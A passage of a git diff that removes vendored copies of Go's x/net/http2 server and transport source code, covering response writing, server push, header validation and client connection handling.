panic("Header called after Handler finished") - } - if rws.bw.Buffered() > 0 { - if err := rws.bw.Flush(); err != nil { - // Ignore the error. The frame writer already knows. - return - } - } else { - // The bufio.Writer won't call chunkWriter.Write - // (writeChunk with zero bytes, so we have to do it - // ourselves to force the HTTP response header and/or - // final DATA frame (with END_STREAM) to be sent. - rws.writeChunk(nil) - } -} - -func (w *responseWriter) CloseNotify() <-chan bool { - rws := w.rws - if rws == nil { - panic("CloseNotify called after Handler finished") - } - rws.closeNotifierMu.Lock() - ch := rws.closeNotifierCh - if ch == nil { - ch = make(chan bool, 1) - rws.closeNotifierCh = ch - cw := rws.stream.cw - go func() { - cw.Wait() // wait for close - ch <- true - }() - } - rws.closeNotifierMu.Unlock() - return ch -} - -func (w *responseWriter) Header() http.Header { - rws := w.rws - if rws == nil { - panic("Header called after Handler finished") - } - if rws.handlerHeader == nil { - rws.handlerHeader = make(http.Header) - } - return rws.handlerHeader -} - -func (w *responseWriter) WriteHeader(code int) { - rws := w.rws - if rws == nil { - panic("WriteHeader called after Handler finished") - } - rws.writeHeader(code) -} - -func (rws *responseWriterState) writeHeader(code int) { - if !rws.wroteHeader { - rws.wroteHeader = true - rws.status = code - if len(rws.handlerHeader) > 0 { - rws.snapHeader = cloneHeader(rws.handlerHeader) - } - } -} - -func cloneHeader(h http.Header) http.Header { - h2 := make(http.Header, len(h)) - for k, vv := range h { - vv2 := make([]string, len(vv)) - copy(vv2, vv) - h2[k] = vv2 - } - return h2 -} - -// The Life Of A Write is like this: -// -// * Handler calls w.Write or w.WriteString -> -// * -> rws.bw (*bufio.Writer) -> -// * (Handler might call Flush) -// * -> chunkWriter{rws} -// * -> responseWriterState.writeChunk(p []byte) -// * -> responseWriterState.writeChunk (most of the magic; see comment there) -func (w *responseWriter) Write(p []byte) (n int, err error) { - return w.write(len(p), p, "") -} - -func (w *responseWriter) WriteString(s string) (n int, err error) { - return w.write(len(s), nil, s) -} - -// either dataB or dataS is non-zero. -func (w *responseWriter) write(lenData int, dataB []byte, dataS string) (n int, err error) { - rws := w.rws - if rws == nil { - panic("Write called after Handler finished") - } - if !rws.wroteHeader { - w.WriteHeader(200) - } - if !bodyAllowedForStatus(rws.status) { - return 0, http.ErrBodyNotAllowed - } - rws.wroteBytes += int64(len(dataB)) + int64(len(dataS)) // only one can be set - if rws.sentContentLen != 0 && rws.wroteBytes > rws.sentContentLen { - // TODO: send a RST_STREAM - return 0, errors.New("http2: handler wrote more than declared Content-Length") - } - - if dataB != nil { - return rws.bw.Write(dataB) - } else { - return rws.bw.WriteString(dataS) - } -} - -func (w *responseWriter) handlerDone() { - rws := w.rws - dirty := rws.dirty - rws.handlerDone = true - w.Flush() - w.rws = nil - if !dirty { - // Only recycle the pool if all prior Write calls to - // the serverConn goroutine completed successfully. If - // they returned earlier due to resets from the peer - // there might still be write goroutines outstanding - // from the serverConn referencing the rws memory. See - // issue 20704. - responseWriterStatePool.Put(rws) - } -} - -// Push errors. -var ( - ErrRecursivePush = errors.New("http2: recursive push not allowed") - ErrPushLimitReached = errors.New("http2: push would exceed peer's SETTINGS_MAX_CONCURRENT_STREAMS") -) - -// pushOptions is the internal version of http.PushOptions, which we -// cannot include here because it's only defined in Go 1.8 and later. -type pushOptions struct { - Method string - Header http.Header -} - -func (w *responseWriter) push(target string, opts pushOptions) error { - st := w.rws.stream - sc := st.sc - sc.serveG.checkNotOn() - - // No recursive pushes: "PUSH_PROMISE frames MUST only be sent on a peer-initiated stream." - // http://tools.ietf.org/html/rfc7540#section-6.6 - if st.isPushed() { - return ErrRecursivePush - } - - // Default options. - if opts.Method == "" { - opts.Method = "GET" - } - if opts.Header == nil { - opts.Header = http.Header{} - } - wantScheme := "http" - if w.rws.req.TLS != nil { - wantScheme = "https" - } - - // Validate the request. - u, err := url.Parse(target) - if err != nil { - return err - } - if u.Scheme == "" { - if !strings.HasPrefix(target, "/") { - return fmt.Errorf("target must be an absolute URL or an absolute path: %q", target) - } - u.Scheme = wantScheme - u.Host = w.rws.req.Host - } else { - if u.Scheme != wantScheme { - return fmt.Errorf("cannot push URL with scheme %q from request with scheme %q", u.Scheme, wantScheme) - } - if u.Host == "" { - return errors.New("URL must have a host") - } - } - for k := range opts.Header { - if strings.HasPrefix(k, ":") { - return fmt.Errorf("promised request headers cannot include pseudo header %q", k) - } - // These headers are meaningful only if the request has a body, - // but PUSH_PROMISE requests cannot have a body. - // http://tools.ietf.org/html/rfc7540#section-8.2 - // Also disallow Host, since the promised URL must be absolute. - switch strings.ToLower(k) { - case "content-length", "content-encoding", "trailer", "te", "expect", "host": - return fmt.Errorf("promised request headers cannot include %q", k) - } - } - if err := checkValidHTTP2RequestHeaders(opts.Header); err != nil { - return err - } - - // The RFC effectively limits promised requests to GET and HEAD: - // "Promised requests MUST be cacheable [GET, HEAD, or POST], and MUST be safe [GET or HEAD]" - // http://tools.ietf.org/html/rfc7540#section-8.2 - if opts.Method != "GET" && opts.Method != "HEAD" { - return fmt.Errorf("method %q must be GET or HEAD", opts.Method) - } - - msg := &startPushRequest{ - parent: st, - method: opts.Method, - url: u, - header: cloneHeader(opts.Header), - done: errChanPool.Get().(chan error), - } - - select { - case <-sc.doneServing: - return errClientDisconnected - case <-st.cw: - return errStreamClosed - case sc.serveMsgCh <- msg: - } - - select { - case <-sc.doneServing: - return errClientDisconnected - case <-st.cw: - return errStreamClosed - case err := <-msg.done: - errChanPool.Put(msg.done) - return err - } -} - -type startPushRequest struct { - parent *stream - method string - url *url.URL - header http.Header - done chan error -} - -func (sc *serverConn) startPush(msg *startPushRequest) { - sc.serveG.check() - - // http://tools.ietf.org/html/rfc7540#section-6.6. - // PUSH_PROMISE frames MUST only be sent on a peer-initiated stream that - // is in either the "open" or "half-closed (remote)" state. - if msg.parent.state != stateOpen && msg.parent.state != stateHalfClosedRemote { - // responseWriter.Push checks that the stream is peer-initiaed. - msg.done <- errStreamClosed - return - } - - // http://tools.ietf.org/html/rfc7540#section-6.6. - if !sc.pushEnabled { - msg.done <- http.ErrNotSupported - return - } - - // PUSH_PROMISE frames must be sent in increasing order by stream ID, so - // we allocate an ID for the promised stream lazily, when the PUSH_PROMISE - // is written. Once the ID is allocated, we start the request handler. - allocatePromisedID := func() (uint32, error) { - sc.serveG.check() - - // Check this again, just in case. Technically, we might have received - // an updated SETTINGS by the time we got around to writing this frame. - if !sc.pushEnabled { - return 0, http.ErrNotSupported - } - // http://tools.ietf.org/html/rfc7540#section-6.5.2. - if sc.curPushedStreams+1 > sc.clientMaxStreams { - return 0, ErrPushLimitReached - } - - // http://tools.ietf.org/html/rfc7540#section-5.1.1. - // Streams initiated by the server MUST use even-numbered identifiers. - // A server that is unable to establish a new stream identifier can send a GOAWAY - // frame so that the client is forced to open a new connection for new streams. - if sc.maxPushPromiseID+2 >= 1<<31 { - sc.startGracefulShutdownInternal() - return 0, ErrPushLimitReached - } - sc.maxPushPromiseID += 2 - promisedID := sc.maxPushPromiseID - - // http://tools.ietf.org/html/rfc7540#section-8.2. - // Strictly speaking, the new stream should start in "reserved (local)", then - // transition to "half closed (remote)" after sending the initial HEADERS, but - // we start in "half closed (remote)" for simplicity. - // See further comments at the definition of stateHalfClosedRemote. - promised := sc.newStream(promisedID, msg.parent.id, stateHalfClosedRemote) - rw, req, err := sc.newWriterAndRequestNoBody(promised, requestParam{ - method: msg.method, - scheme: msg.url.Scheme, - authority: msg.url.Host, - path: msg.url.RequestURI(), - header: cloneHeader(msg.header), // clone since handler runs concurrently with writing the PUSH_PROMISE - }) - if err != nil { - // Should not happen, since we've already validated msg.url. - panic(fmt.Sprintf("newWriterAndRequestNoBody(%+v): %v", msg.url, err)) - } - - go sc.runHandler(rw, req, sc.handler.ServeHTTP) - return promisedID, nil - } - - sc.writeFrame(FrameWriteRequest{ - write: &writePushPromise{ - streamID: msg.parent.id, - method: msg.method, - url: msg.url, - h: msg.header, - allocatePromisedID: allocatePromisedID, - }, - stream: msg.parent, - done: msg.done, - }) -} - -// foreachHeaderElement splits v according to the "#rule" construction -// in RFC 2616 section 2.1 and calls fn for each non-empty element. -func foreachHeaderElement(v string, fn func(string)) { - v = textproto.TrimString(v) - if v == "" { - return - } - if !strings.Contains(v, ",") { - fn(v) - return - } - for _, f := range strings.Split(v, ",") { - if f = textproto.TrimString(f); f != "" { - fn(f) - } - } -} - -// From http://httpwg.org/specs/rfc7540.html#rfc.section.8.1.2.2 -var connHeaders = []string{ - "Connection", - "Keep-Alive", - "Proxy-Connection", - "Transfer-Encoding", - "Upgrade", -} - -// checkValidHTTP2RequestHeaders checks whether h is a valid HTTP/2 request, -// per RFC 7540 Section 8.1.2.2. -// The returned error is reported to users. -func checkValidHTTP2RequestHeaders(h http.Header) error { - for _, k := range connHeaders { - if _, ok := h[k]; ok { - return fmt.Errorf("request header %q is not valid in HTTP/2", k) - } - } - te := h["Te"] - if len(te) > 0 && (len(te) > 1 || (te[0] != "trailers" && te[0] != "")) { - return errors.New(`request header "TE" may only be "trailers" in HTTP/2`) - } - return nil -} - -func new400Handler(err error) http.HandlerFunc { - return func(w http.ResponseWriter, r *http.Request) { - http.Error(w, err.Error(), http.StatusBadRequest) - } -} - -// ValidTrailerHeader reports whether name is a valid header field name to appear -// in trailers. -// See: http://tools.ietf.org/html/rfc7230#section-4.1.2 -func ValidTrailerHeader(name string) bool { - name = http.CanonicalHeaderKey(name) - if strings.HasPrefix(name, "If-") || badTrailer[name] { - return false - } - return true -} - -var badTrailer = map[string]bool{ - "Authorization": true, - "Cache-Control": true, - "Connection": true, - "Content-Encoding": true, - "Content-Length": true, - "Content-Range": true, - "Content-Type": true, - "Expect": true, - "Host": true, - "Keep-Alive": true, - "Max-Forwards": true, - "Pragma": true, - "Proxy-Authenticate": true, - "Proxy-Authorization": true, - "Proxy-Connection": true, - "Range": true, - "Realm": true, - "Te": true, - "Trailer": true, - "Transfer-Encoding": true, - "Www-Authenticate": true, -} - -// h1ServerKeepAlivesDisabled reports whether hs has its keep-alives -// disabled. See comments on h1ServerShutdownChan above for why -// the code is written this way. -func h1ServerKeepAlivesDisabled(hs *http.Server) bool { - var x interface{} = hs - type I interface { - doKeepAlives() bool - } - if hs, ok := x.(I); ok { - return !hs.doKeepAlives() - } - return false -} diff --git a/vendor/golang.org/x/net/http2/transport.go b/vendor/golang.org/x/net/http2/transport.go deleted file mode 100644 index 850d7ae0..00000000 --- a/vendor/golang.org/x/net/http2/transport.go +++ /dev/null @@ -1,2134 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Transport code. - -package http2 - -import ( - "bufio" - "bytes" - "compress/gzip" - "crypto/rand" - "crypto/tls" - "errors" - "fmt" - "io" - "io/ioutil" - "log" - "math" - "net" - "net/http" - "sort" - "strconv" - "strings" - "sync" - "time" - - "golang.org/x/net/http2/hpack" - "golang.org/x/net/idna" - "golang.org/x/net/lex/httplex" -) - -const ( - // transportDefaultConnFlow is how many connection-level flow control - // tokens we give the server at start-up, past the default 64k. - transportDefaultConnFlow = 1 << 30 - - // transportDefaultStreamFlow is how many stream-level flow - // control tokens we announce to the peer, and how many bytes - // we buffer per stream. - transportDefaultStreamFlow = 4 << 20 - - // transportDefaultStreamMinRefresh is the minimum number of bytes we'll send - // a stream-level WINDOW_UPDATE for at a time. - transportDefaultStreamMinRefresh = 4 << 10 - - defaultUserAgent = "Go-http-client/2.0" -) - -// Transport is an HTTP/2 Transport. -// -// A Transport internally caches connections to servers. It is safe -// for concurrent use by multiple goroutines. -type Transport struct { - // DialTLS specifies an optional dial function for creating - // TLS connections for requests. - // - // If DialTLS is nil, tls.Dial is used. - // - // If the returned net.Conn has a ConnectionState method like tls.Conn, - // it will be used to set http.Response.TLS. - DialTLS func(network, addr string, cfg *tls.Config) (net.Conn, error) - - // TLSClientConfig specifies the TLS configuration to use with - // tls.Client. If nil, the default configuration is used. - TLSClientConfig *tls.Config - - // ConnPool optionally specifies an alternate connection pool to use. - // If nil, the default is used. - ConnPool ClientConnPool - - // DisableCompression, if true, prevents the Transport from - // requesting compression with an "Accept-Encoding: gzip" - // request header when the Request contains no existing - // Accept-Encoding value. If the Transport requests gzip on - // its own and gets a gzipped response, it's transparently - // decoded in the Response.Body. However, if the user - // explicitly requested gzip it is not automatically - // uncompressed. - DisableCompression bool - - // AllowHTTP, if true, permits HTTP/2 requests using the insecure, - // plain-text "http" scheme. Note that this does not enable h2c support. - AllowHTTP bool - - // MaxHeaderListSize is the http2 SETTINGS_MAX_HEADER_LIST_SIZE to - // send in the initial settings frame. It is how many bytes - // of response headers are allow. Unlike the http2 spec, zero here - // means to use a default limit (currently 10MB). If you actually - // want to advertise an ulimited value to the peer, Transport - // interprets the highest possible value here (0xffffffff or 1<<32-1) - // to mean no limit. - MaxHeaderListSize uint32 - - // t1, if non-nil, is the standard library Transport using - // this transport. Its settings are used (but not its - // RoundTrip method, etc). - t1 *http.Transport - - connPoolOnce sync.Once - connPoolOrDef ClientConnPool // non-nil version of ConnPool -} - -func (t *Transport) maxHeaderListSize() uint32 { - if t.MaxHeaderListSize == 0 { - return 10 << 20 - } - if t.MaxHeaderListSize == 0xffffffff { - return 0 - } - return t.MaxHeaderListSize -} - -func (t *Transport) disableCompression() bool { - return t.DisableCompression || (t.t1 != nil && t.t1.DisableCompression) -} - -var errTransportVersion = errors.New("http2: ConfigureTransport is only supported starting at Go 1.6") - -// ConfigureTransport configures a net/http HTTP/1 Transport to use HTTP/2. -// It requires Go 1.6 or later and returns an error if the net/http package is too old -// or if t1 has already been HTTP/2-enabled. -func ConfigureTransport(t1 *http.Transport) error { - _, err := configureTransport(t1) // in configure_transport.go (go1.6) or not_go16.go - return err -} - -func (t *Transport) connPool() ClientConnPool { - t.connPoolOnce.Do(t.initConnPool) - return t.connPoolOrDef -} - -func (t *Transport) initConnPool() { - if t.ConnPool != nil { - t.connPoolOrDef = t.ConnPool - } else { - t.connPoolOrDef = &clientConnPool{t: t} - } -} - -// ClientConn is the state of a single HTTP/2 client connection to an -// HTTP/2 server. -type ClientConn struct { - t *Transport - tconn net.Conn // usually *tls.Conn, except specialized impls - tlsState *tls.ConnectionState // nil only for specialized impls - singleUse bool // whether being used for a single http.Request - - // readLoop goroutine fields: - readerDone chan struct{} // closed on error - readerErr error // set before readerDone is closed - - idleTimeout time.Duration // or 0 for never - idleTimer *time.Timer - - mu sync.Mutex // guards following - cond *sync.Cond // hold mu; broadcast on flow/closed changes - flow flow // our conn-level flow control quota (cs.flow is per stream) - inflow flow // peer's conn-level flow control - closed bool - wantSettingsAck bool // we sent a SETTINGS frame and haven't heard back - goAway *GoAwayFrame // if non-nil, the GoAwayFrame we received - goAwayDebug string // goAway frame's debug data, retained as a string - streams map[uint32]*clientStream // client-initiated - nextStreamID uint32 - pings map[[8]byte]chan struct{} // in flight ping data to notification channel - bw *bufio.Writer - br *bufio.Reader - fr *Framer - lastActive time.Time - // Settings from peer: (also guarded by mu) - maxFrameSize uint32 - maxConcurrentStreams uint32 - initialWindowSize uint32 - - hbuf bytes.Buffer // HPACK encoder writes into this - henc *hpack.Encoder - freeBuf [][]byte - - wmu sync.Mutex // held while writing; acquire AFTER mu if holding both - werr error // first write error that has occurred -} - -// clientStream is the state for a single HTTP/2 stream. One of these -// is created for each Transport.RoundTrip call. -type clientStream struct { - cc *ClientConn - req *http.Request - trace *clientTrace // or nil - ID uint32 - resc chan resAndError - bufPipe pipe // buffered pipe with the flow-controlled response payload - startedWrite bool // started request body write; guarded by cc.mu - requestedGzip bool - on100 func() // optional code to run if get a 100 continue response - - flow flow // guarded by cc.mu - inflow flow // guarded by cc.mu - bytesRemain int64 // -1 means unknown; owned by transportResponseBody.Read - readErr error // sticky read error; owned by transportResponseBody.Read - stopReqBody error // if non-nil, stop writing req body; guarded by cc.mu - didReset bool // whether we sent a RST_STREAM to the server; guarded by cc.mu - - peerReset chan struct{} // closed on peer reset - resetErr error // populated before peerReset is closed - - done chan struct{} // closed when stream remove from cc.streams map; close calls guarded by cc.mu - - // owned by clientConnReadLoop: - firstByte bool // got the first response byte - pastHeaders bool // got first MetaHeadersFrame (actual headers) - pastTrailers bool // got optional second MetaHeadersFrame (trailers) - - trailer http.Header // accumulated trailers - resTrailer *http.Header // client's Response.Trailer -} - -// awaitRequestCancel runs in its own goroutine and waits for the user -// to cancel a RoundTrip request, its context to expire, or for the -// request to be done (any way it might be removed from the cc.streams -// map: peer reset, successful completion, TCP connection breakage, -// etc) -func (cs *clientStream) awaitRequestCancel(req *http.Request) { - ctx := reqContext(req) - if req.Cancel == nil && ctx.Done() == nil { - return - } - select { - case <-req.Cancel: - cs.cancelStream() - cs.bufPipe.CloseWithError(errRequestCanceled) - case <-ctx.Done(): - cs.cancelStream() - cs.bufPipe.CloseWithError(ctx.Err()) - case <-cs.done: - } -} - -func (cs *clientStream) cancelStream() { - cs.cc.mu.Lock() - didReset := cs.didReset - cs.didReset = true - cs.cc.mu.Unlock() - - if !didReset { - cs.cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } -} - -// checkResetOrDone reports any error sent in a RST_STREAM frame by the -// server, or errStreamClosed if the stream is complete. -func (cs *clientStream) checkResetOrDone() error { - select { - case <-cs.peerReset: - return cs.resetErr - case <-cs.done: - return errStreamClosed - default: - return nil - } -} - -func (cs *clientStream) abortRequestBodyWrite(err error) { - if err == nil { - panic("nil error") - } - cc := cs.cc - cc.mu.Lock() - cs.stopReqBody = err - cc.cond.Broadcast() - cc.mu.Unlock() -} - -type stickyErrWriter struct { - w io.Writer - err *error -} - -func (sew stickyErrWriter) Write(p []byte) (n int, err error) { - if *sew.err != nil { - return 0, *sew.err - } - n, err = sew.w.Write(p) - *sew.err = err - return -} - -var ErrNoCachedConn = errors.New("http2: no cached connection was available") - -// RoundTripOpt are options for the Transport.RoundTripOpt method. -type RoundTripOpt struct { - // OnlyCachedConn controls whether RoundTripOpt may - // create a new TCP connection. If set true and - // no cached connection is available, RoundTripOpt - // will return ErrNoCachedConn. - OnlyCachedConn bool -} - -func (t *Transport) RoundTrip(req *http.Request) (*http.Response, error) { - return t.RoundTripOpt(req, RoundTripOpt{}) -} - -// authorityAddr returns a given authority (a host/IP, or host:port / ip:port) -// and returns a host:port. The port 443 is added if needed. -func authorityAddr(scheme string, authority string) (addr string) { - host, port, err := net.SplitHostPort(authority) - if err != nil { // authority didn't have a port - port = "443" - if scheme == "http" { - port = "80" - } - host = authority - } - if a, err := idna.ToASCII(host); err == nil { - host = a - } - // IPv6 address literal, without a port: - if strings.HasPrefix(host, "[") && strings.HasSuffix(host, "]") { - return host + ":" + port - } - return net.JoinHostPort(host, port) -} - -// RoundTripOpt is like RoundTrip, but takes options. -func (t *Transport) RoundTripOpt(req *http.Request, opt RoundTripOpt) (*http.Response, error) { - if !(req.URL.Scheme == "https" || (req.URL.Scheme == "http" && t.AllowHTTP)) { - return nil, errors.New("http2: unsupported scheme") - } - - addr := authorityAddr(req.URL.Scheme, req.URL.Host) - for { - cc, err := t.connPool().GetClientConn(req, addr) - if err != nil { - t.vlogf("http2: Transport failed to get client conn for %s: %v", addr, err) - return nil, err - } - traceGotConn(req, cc) - res, err := cc.RoundTrip(req) - if err != nil { - if req, err = shouldRetryRequest(req, err); err == nil { - continue - } - } - if err != nil { - t.vlogf("RoundTrip failure: %v", err) - return nil, err - } - return res, nil - } -} - -// CloseIdleConnections closes any connections which were previously -// connected from previous requests but are now sitting idle. -// It does not interrupt any connections currently in use. -func (t *Transport) CloseIdleConnections() { - if cp, ok := t.connPool().(clientConnPoolIdleCloser); ok { - cp.closeIdleConnections() - } -} - -var ( - errClientConnClosed = errors.New("http2: client conn is closed") - errClientConnUnusable = errors.New("http2: client conn not usable") - - errClientConnGotGoAway = errors.New("http2: Transport received Server's graceful shutdown GOAWAY") - errClientConnGotGoAwayAfterSomeReqBody = errors.New("http2: Transport received Server's graceful shutdown GOAWAY; some request body already written") -) - -// shouldRetryRequest is called by RoundTrip when a request fails to get -// response headers. It is always called with a non-nil error. -// It returns either a request to retry (either the same request, or a -// modified clone), or an error if the request can't be replayed. -func shouldRetryRequest(req *http.Request, err error) (*http.Request, error) { - switch err { - default: - return nil, err - case errClientConnUnusable, errClientConnGotGoAway: - return req, nil - case errClientConnGotGoAwayAfterSomeReqBody: - // If the Body is nil (or http.NoBody), it's safe to reuse - // this request and its Body. - if req.Body == nil || reqBodyIsNoBody(req.Body) { - return req, nil - } - // Otherwise we depend on the Request having its GetBody - // func defined. - getBody := reqGetBody(req) // Go 1.8: getBody = req.GetBody - if getBody == nil { - return nil, errors.New("http2: Transport: peer server initiated graceful shutdown after some of Request.Body was written; define Request.GetBody to avoid this error") - } - body, err := getBody() - if err != nil { - return nil, err - } - newReq := *req - newReq.Body = body - return &newReq, nil - } -} - -func (t *Transport) dialClientConn(addr string, singleUse bool) (*ClientConn, error) { - host, _, err := net.SplitHostPort(addr) - if err != nil { - return nil, err - } - tconn, err := t.dialTLS()("tcp", addr, t.newTLSConfig(host)) - if err != nil { - return nil, err - } - return t.newClientConn(tconn, singleUse) -} - -func (t *Transport) newTLSConfig(host string) *tls.Config { - cfg := new(tls.Config) - if t.TLSClientConfig != nil { - *cfg = *cloneTLSConfig(t.TLSClientConfig) - } - if !strSliceContains(cfg.NextProtos, NextProtoTLS) { - cfg.NextProtos = append([]string{NextProtoTLS}, cfg.NextProtos...) - } - if cfg.ServerName == "" { - cfg.ServerName = host - } - return cfg -} - -func (t *Transport) dialTLS() func(string, string, *tls.Config) (net.Conn, error) { - if t.DialTLS != nil { - return t.DialTLS - } - return t.dialTLSDefault -} - -func (t *Transport) dialTLSDefault(network, addr string, cfg *tls.Config) (net.Conn, error) { - cn, err := tls.Dial(network, addr, cfg) - if err != nil { - return nil, err - } - if err := cn.Handshake(); err != nil { - return nil, err - } - if !cfg.InsecureSkipVerify { - if err := cn.VerifyHostname(cfg.ServerName); err != nil { - return nil, err - } - } - state := cn.ConnectionState() - if p := state.NegotiatedProtocol; p != NextProtoTLS { - return nil, fmt.Errorf("http2: unexpected ALPN protocol %q; want %q", p, NextProtoTLS) - } - if !state.NegotiatedProtocolIsMutual { - return nil, errors.New("http2: could not negotiate protocol mutually") - } - return cn, nil -} - -// disableKeepAlives reports whether connections should be closed as -// soon as possible after handling the first request. -func (t *Transport) disableKeepAlives() bool { - return t.t1 != nil && t.t1.DisableKeepAlives -} - -func (t *Transport) expectContinueTimeout() time.Duration { - if t.t1 == nil { - return 0 - } - return transportExpectContinueTimeout(t.t1) -} - -func (t *Transport) NewClientConn(c net.Conn) (*ClientConn, error) { - return t.newClientConn(c, false) -} - -func (t *Transport) newClientConn(c net.Conn, singleUse bool) (*ClientConn, error) { - cc := &ClientConn{ - t: t, - tconn: c, - readerDone: make(chan struct{}), - nextStreamID: 1, - maxFrameSize: 16 << 10, // spec default - initialWindowSize: 65535, // spec default - maxConcurrentStreams: 1000, // "infinite", per spec. 1000 seems good enough. - streams: make(map[uint32]*clientStream), - singleUse: singleUse, - wantSettingsAck: true, - pings: make(map[[8]byte]chan struct{}), - } - if d := t.idleConnTimeout(); d != 0 { - cc.idleTimeout = d - cc.idleTimer = time.AfterFunc(d, cc.onIdleTimeout) - } - if VerboseLogs { - t.vlogf("http2: Transport creating client conn %p to %v", cc, c.RemoteAddr()) - } - - cc.cond = sync.NewCond(&cc.mu) - cc.flow.add(int32(initialWindowSize)) - - // TODO: adjust this writer size to account for frame size + - // MTU + crypto/tls record padding. - cc.bw = bufio.NewWriter(stickyErrWriter{c, &cc.werr}) - cc.br = bufio.NewReader(c) - cc.fr = NewFramer(cc.bw, cc.br) - cc.fr.ReadMetaHeaders = hpack.NewDecoder(initialHeaderTableSize, nil) - cc.fr.MaxHeaderListSize = t.maxHeaderListSize() - - // TODO: SetMaxDynamicTableSize, SetMaxDynamicTableSizeLimit on - // henc in response to SETTINGS frames? - cc.henc = hpack.NewEncoder(&cc.hbuf) - - if cs, ok := c.(connectionStater); ok { - state := cs.ConnectionState() - cc.tlsState = &state - } - - initialSettings := []Setting{ - {ID: SettingEnablePush, Val: 0}, - {ID: SettingInitialWindowSize, Val: transportDefaultStreamFlow}, - } - if max := t.maxHeaderListSize(); max != 0 { - initialSettings = append(initialSettings, Setting{ID: SettingMaxHeaderListSize, Val: max}) - } - - cc.bw.Write(clientPreface) - cc.fr.WriteSettings(initialSettings...) - cc.fr.WriteWindowUpdate(0, transportDefaultConnFlow) - cc.inflow.add(transportDefaultConnFlow + initialWindowSize) - cc.bw.Flush() - if cc.werr != nil { - return nil, cc.werr - } - - go cc.readLoop() - return cc, nil -} - -func (cc *ClientConn) setGoAway(f *GoAwayFrame) { - cc.mu.Lock() - defer cc.mu.Unlock() - - old := cc.goAway - cc.goAway = f - - // Merge the previous and current GoAway error frames. - if cc.goAwayDebug == "" { - cc.goAwayDebug = string(f.DebugData()) - } - if old != nil && old.ErrCode != ErrCodeNo { - cc.goAway.ErrCode = old.ErrCode - } - last := f.LastStreamID - for streamID, cs := range cc.streams { - if streamID > last { - select { - case cs.resc <- resAndError{err: errClientConnGotGoAway}: - default: - } - } - } -} - -func (cc *ClientConn) CanTakeNewRequest() bool { - cc.mu.Lock() - defer cc.mu.Unlock() - return cc.canTakeNewRequestLocked() -} - -func (cc *ClientConn) canTakeNewRequestLocked() bool { - if cc.singleUse && cc.nextStreamID > 1 { - return false - } - return cc.goAway == nil && !cc.closed && - int64(len(cc.streams)+1) < int64(cc.maxConcurrentStreams) && - cc.nextStreamID < math.MaxInt32 -} - -// onIdleTimeout is called from a time.AfterFunc goroutine. It will -// only be called when we're idle, but because we're coming from a new -// goroutine, there could be a new request coming in at the same time, -// so this simply calls the synchronized closeIfIdle to shut down this -// connection. The timer could just call closeIfIdle, but this is more -// clear. -func (cc *ClientConn) onIdleTimeout() { - cc.closeIfIdle() -} - -func (cc *ClientConn) closeIfIdle() { - cc.mu.Lock() - if len(cc.streams) > 0 { - cc.mu.Unlock() - return - } - cc.closed = true - nextID := cc.nextStreamID - // TODO: do clients send GOAWAY too? maybe? Just Close: - cc.mu.Unlock() - - if VerboseLogs { - cc.vlogf("http2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)", cc, cc.singleUse, nextID-2) - } - cc.tconn.Close() -} - -const maxAllocFrameSize = 512 << 10 - -// frameBuffer returns a scratch buffer suitable for writing DATA frames. -// They're capped at the min of the peer's max frame size or 512KB -// (kinda arbitrarily), but definitely capped so we don't allocate 4GB -// bufers. -func (cc *ClientConn) frameScratchBuffer() []byte { - cc.mu.Lock() - size := cc.maxFrameSize - if size > maxAllocFrameSize { - size = maxAllocFrameSize - } - for i, buf := range cc.freeBuf { - if len(buf) >= int(size) { - cc.freeBuf[i] = nil - cc.mu.Unlock() - return buf[:size] - } - } - cc.mu.Unlock() - return make([]byte, size) -} - -func (cc *ClientConn) putFrameScratchBuffer(buf []byte) { - cc.mu.Lock() - defer cc.mu.Unlock() - const maxBufs = 4 // arbitrary; 4 concurrent requests per conn? investigate. - if len(cc.freeBuf) < maxBufs { - cc.freeBuf = append(cc.freeBuf, buf) - return - } - for i, old := range cc.freeBuf { - if old == nil { - cc.freeBuf[i] = buf - return - } - } - // forget about it. -} - -// errRequestCanceled is a copy of net/http's errRequestCanceled because it's not -// exported. At least they'll be DeepEqual for h1-vs-h2 comparisons tests. -var errRequestCanceled = errors.New("net/http: request canceled") - -func commaSeparatedTrailers(req *http.Request) (string, error) { - keys := make([]string, 0, len(req.Trailer)) - for k := range req.Trailer { - k = http.CanonicalHeaderKey(k) - switch k { - case "Transfer-Encoding", "Trailer", "Content-Length": - return "", &badStringError{"invalid Trailer key", k} - } - keys = append(keys, k) - } - if len(keys) > 0 { - sort.Strings(keys) - return strings.Join(keys, ","), nil - } - return "", nil -} - -func (cc *ClientConn) responseHeaderTimeout() time.Duration { - if cc.t.t1 != nil { - return cc.t.t1.ResponseHeaderTimeout - } - // No way to do this (yet?) with just an http2.Transport. Probably - // no need. Request.Cancel this is the new way. We only need to support - // this for compatibility with the old http.Transport fields when - // we're doing transparent http2. - return 0 -} - -// checkConnHeaders checks whether req has any invalid connection-level headers. -// per RFC 7540 section 8.1.2.2: Connection-Specific Header Fields. -// Certain headers are special-cased as okay but not transmitted later. -func checkConnHeaders(req *http.Request) error { - if v := req.Header.Get("Upgrade"); v != "" { - return fmt.Errorf("http2: invalid Upgrade request header: %q", req.Header["Upgrade"]) - } - if vv := req.Header["Transfer-Encoding"]; len(vv) > 0 && (len(vv) > 1 || vv[0] != "" && vv[0] != "chunked") { - return fmt.Errorf("http2: invalid Transfer-Encoding request header: %q", vv) - } - if vv := req.Header["Connection"]; len(vv) > 0 && (len(vv) > 1 || vv[0] != "" && vv[0] != "close" && vv[0] != "keep-alive") { - return fmt.Errorf("http2: invalid Connection request header: %q", vv) - } - return nil -} - -// actualContentLength returns a sanitized version of -// req.ContentLength, where 0 actually means zero (not unknown) and -1 -// means unknown. -func actualContentLength(req *http.Request) int64 { - if req.Body == nil || reqBodyIsNoBody(req.Body) { - return 0 - } - if req.ContentLength != 0 { - return req.ContentLength - } - return -1 -} - -func (cc *ClientConn) RoundTrip(req *http.Request) (*http.Response, error) { - if err := checkConnHeaders(req); err != nil { - return nil, err - } - if cc.idleTimer != nil { - cc.idleTimer.Stop() - } - - trailers, err := commaSeparatedTrailers(req) - if err != nil { - return nil, err - } - hasTrailers := trailers != "" - - cc.mu.Lock() - cc.lastActive = time.Now() - if cc.closed || !cc.canTakeNewRequestLocked() { - cc.mu.Unlock() - return nil, errClientConnUnusable - } - - body := req.Body - contentLen := actualContentLength(req) - hasBody := contentLen != 0 - - // TODO(bradfitz): this is a copy of the logic in net/http. Unify 